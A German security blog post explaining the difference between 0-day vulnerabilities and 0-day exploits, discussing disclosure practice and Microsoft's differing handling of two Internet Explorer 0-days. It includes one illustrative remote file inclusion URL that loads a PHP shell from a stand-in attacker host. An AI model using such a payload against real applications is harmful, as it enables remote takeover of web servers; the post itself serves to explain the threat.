Dipl.-Inform. Carsten Eilers

Ein 0-Day-Schwachstelle ist eine Schwachstelle, die veröffentlicht wird, bevor es einen Patch dafür gibt. Dafür kann es viele Gründe geben. Der einfachste ist, dass jemand eine Schwachstelle findet und sofort veröffentlicht, ohne die betroffenen Entwickler vorher zu informieren und ihnen Zeit zum Patchen der Schwachstelle zu geben. Dieser Fall ist aber inzwischen ziemlich selten. Die meisten Sicherheitsforscher informieren die betroffenen Entwickler vertraulich über gefundene Schwachstellen und veröffentlichen sie erst, wenn es einen Patch gibt. Andere Forscher veröffentlichen die zunächst vertraulich gemeldeten Schwachstellen, wenn die Entwickler nicht innerhalb eines bestimmten Zeitraums angemessen reagieren und/oder einen Patch veröffentlichen.

Ein Beispiel für eine aus diesen Grund veröffentlichte 0-Day-Schwachstelle ist die von Tavis Ormandy im Juni 2010 veröffentlichte Schwachstelle im Windows Help and Support Center: Microsoft wollte keinen Patch im von Ormandy gewünschten Zeitraum zusagen, außerdem lief die Kommunikation nicht gerade optimal, und Ormandy sah sich gezwungen, die Schwachstelle zu veröffentlichen ohne dass es einen Patch gab. Unter anderem, weil er davon ausgehen musste, dass die Schwachstelle bereits Cyberkriminellen bekannt war. Nach der Veröffentlichung gab es denn plötzlich eine Art Wunderheilung: Microsoft veröffentlichte den Patch schneller als von Ormandy ursprünglich gefordert: Während Ormandy einen Patch innerhalb von 60 Tagen gefordert hatte, wurde er nun schon nach 38 Tagen ausgeliefert. Was zeigt, das öffentliche Druck durch die Veröffentlichung einer Schwachstelle durchaus geeignet ist, um deren Korrektur zu beschleunigen.

Diese 0-Day-Schwachstellen sind im allgemeinen erst mal relativ harmlos. So lange es keinen Exploit dafür gibt, können sie nicht ausgenutzt werden. Das "relativ" bezieht sich auf die Tatsache, dass manche Schwachstellen so leicht auszunutzen sind, dass ein Exploit gar nicht nötig ist.

Nehmen wir zum Beispiel mal eine Remote File Inclusion (RFI) in einer PHP-Anwendung. Wenn bekannt wird, dass über den Parameter dateiname im Skript /anwendung/pfad/zum/skript.php eine RFI möglich ist, kann jedes Skriptkiddie die Schwachstelle ausnutzen. Denn der "Exploit" besteht einfach darin, für den Parameter dateiname den URL für eine PHP-Shell zu übergeben:

http://opfer.example/anwendung/pfad/zum/skript.php?dateiname=http://boese.example/php-shell.php

In diesem Fall gibt es mit der Veröffentlichung der 0-Day-Schwachstelle auch sofort einen passenden Exploit. In anderen Fällen ist der aber nicht so einfach zu entwickeln. Nehmen wir zum Beispiel einen Pufferüberlauf in einem Webbrowser. Wenn bekannt wird, dass ein Browser abstürzt, wenn der Wert eines Attributs eines bestimmten HTML-Tags länger als 1.000 Zeichen wird und dabei Teile des Stacks überschrieben werden, spricht viel dafür, dass es sich um eine ausnutzbare Pufferüberlauf-Schwachstelle handelt.

Ob sie aber wirklich ausnutzbar ist, weiß man erst, wenn es einen Proof-of-Concept oder einen Exploit dafür gibt. Wobei sich aus einem PoC, der zum Beispiel den Windows-Taschenrechner startet, relativ leicht ein Exploit zum Nachladen von Schadcode ableiten lässt. Ohne PoC und Exploit kann die Schwachstelle nicht ausgenutzt werden. Und darauf bezieht sich das "erst mal" - früher oder später wird sicher jemand einen PoC entwickeln, den die Cyberkriminellen dann zu einem Exploit erweitern. Oder die Cyberkriminellen entwickeln selbst einen Exploit.

Erst der Exploit macht die Schwachstelle gefährlich

Extrem gefährlich ist ein 0-Day-Exploit, also ein Exploit für eine 0-Day-Schwachstelle. Denn da es für die Schwachstelle keinen Patch gibt, besteht der einzige Schutz vor einem Angriff darin, die betreffende Software nicht zu nutzen (sofern man das kann und rechtzeitig von den Angriffen erfährt) oder einen Workaround zu verwenden (sofern es einen gibt, man den nutzen kann und rechtzeitig davon erfährt). Theoretisch sollen Virenscanner auch vor 0-Day-Angriffen schützen, aber die wurden ja bekanntlich für tot erklärt, weil sie nicht wirklich funktionieren.

Virenscanner fischen nur das "Grundrauschen" des Internet raus (oder das, was sie dafür halten): All die längst bekannten Schädlinge, die die Cyberkriminellen weiter verteilen, weil es genug ungepatchte und/oder ungeschützte Systeme gibt, auf denen sie erfolgreich sind, oder unaufmerksame Benutzer die getarnten Programme und Trojaner starten und/oder installieren.

Sofern erst die Schwachstelle und dann der Exploit bekannt werden haben die Entwickler zumindest eine Chance, einen Workaround oder sogar Patch zu entwickeln, bevor es zu ersten Angriffen kommt. Die meisten 0-Day-Schwachstellen werden heutzutage aber erst durch den zugehörigen 0-Day-Exploit entdeckt. Sehr erfolgreich ist dabei FireEye, die dieses Jahr bereits zwei 0-Day-Exploits für den IE entdeckt haben. Wenn FireEye so einen Exploit entdeckt, stellt man zuerst nur fest, dass er bisher unbekannt war und vermutlich eine bisher unbekannte Schwachstelle ausnutzt. Worin die besteht, muss dann erst mal durch eine genaue Analyse des Exploits ermittelt werden. Worin das Problem dann tatsächlich besteht können nur die betroffenen Entwickler feststellen.

Was ist der Unterschied zwischen diesem und diesem 0-Day-Exploit?

Im Mai hat Microsoft zwei 0-Day-Schwachstellen im IE gepatcht: Am 1. Mai außer der Reihe die im April selbst veröffentlichte Schwachstelle, am regulären Patchday dann eine weitere, vor der man die Benutzer zuvor nicht gewarnt hat. Was unterscheidet diese Schwachstellen oder ihre Exploits von einander?

Das wird Microsoft hoffentlich wissen, denn von außen sehe ich keinen Unterschied: Beide Exploits nutzen bisher unbekannte Schwachstellen im IE aus, sind also 0-Day-Exploits. Beide Exploits wurden im Rahmen vereinzelter, vermutlich mehr oder weniger gezielter Angriffe eingesetzt. Vor dem ersten hat Microsoft erst gewarnt und dann sogar außer der Reihe einen Patch veröffentlicht. Den zweiten hat man geheim gehalten und die Angriffe erst am regulären Patchday zusammen mit den Patches für die Schwachstelle veröffentlicht.

Microsoft hat also entschieden, dass die erste Schwachstelle so gefährlich ist, dass die IE-Benutzer davor gewarnt werden müssen. Während die zweite geheim gehalten wurde und dadurch weitere Opfer in Kauf genommen wurden. Irgendwie gefällt mir das gar nicht. Die unterschiedliche Behandlung wäre ja verständlich, wenn die zweite Schwachstelle "nur" eine 0-Day-Schwachstelle ohne Exploit und Angriffe wäre, aber beide Schwachstellen wurden ja bereits ausgenutzt, für beide waren 0-Day-Exploits im Umlauf.

Man wird bei Microsoft sicher gute Gründe für die unterschiedliche Behandlung der Schwachstellen und damit der Angriffe haben. Zumindest diejenigen, die dem zweiten Exploit zum Opfer gefallen sind nachdem Microsoft über die Angriffe informiert war, werden diese Gründe gar nicht gut finden. Ganz egal wie auch immer sie aussehen mögen,

Carsten Eilers